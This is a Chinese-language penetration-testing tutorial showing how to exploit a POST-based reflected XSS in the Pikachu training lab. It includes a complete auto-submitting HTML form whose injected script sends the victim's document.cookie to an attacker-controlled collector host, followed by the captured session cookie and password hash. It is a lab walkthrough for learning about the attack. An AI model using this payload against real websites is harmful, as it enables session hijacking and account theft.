web渗透测试-从入门到放弃-04XSS-Cookie-POST利用

mac2024-12-24  26

POST型XSS的利用:cookie获取

用户——>Request伪造页面,触发表单——>攻击者伪造表单自动提交页面(一个当用户访问这个就会触发js脚本窃取cookie信息给攻击者后台的链接)——>存在post型XSS漏洞的网站 伪造的自动提交页面的代码(在pikachu网站中可以搜索找到): post.html:

<html> <head> <script> window.onload = function() { document.getElementById("postsubmit").click(); } </script> </head> <body> <form method="post" action="http://127.0.0.1/pikachu/vul/xss/xsspost/xss_reflected_post.php"> <input id="xssr_in" type="text" name="message" value= "<script> document.location = 'http://192.168.10.130/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie; 这里的ip是后台接受cookie的主机 </script>" /> <input id="postsubmit" type="submit" name="submit" value="submit" /> </form> </body> </html>

192.168.43.229是我主机的IP地址,以下是我们构造用户访问的链接

http://192.168.43.229/pikachu/pkxss/xcookie/post.html

我们来到反射型xss-post,我们这里输入admin,123456登陆 现在用户是登陆状态,然后我们模拟用户访问了一个我们发送的post.html的链接(浏览器新建标签页) 然后页面重定向到了首页 我们再回到ip为:192.168.10.130的后台页面刷新 在这里可以看到获取到的cookie值:

ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=3vtjdj8v0c2p15437m56tsdqe3

其中uname,用户名是admin,pw是10470c3b4b1fed12c3baac014be15fac67c6e815,这一串使用md5解密后是123456。

最新回复(0)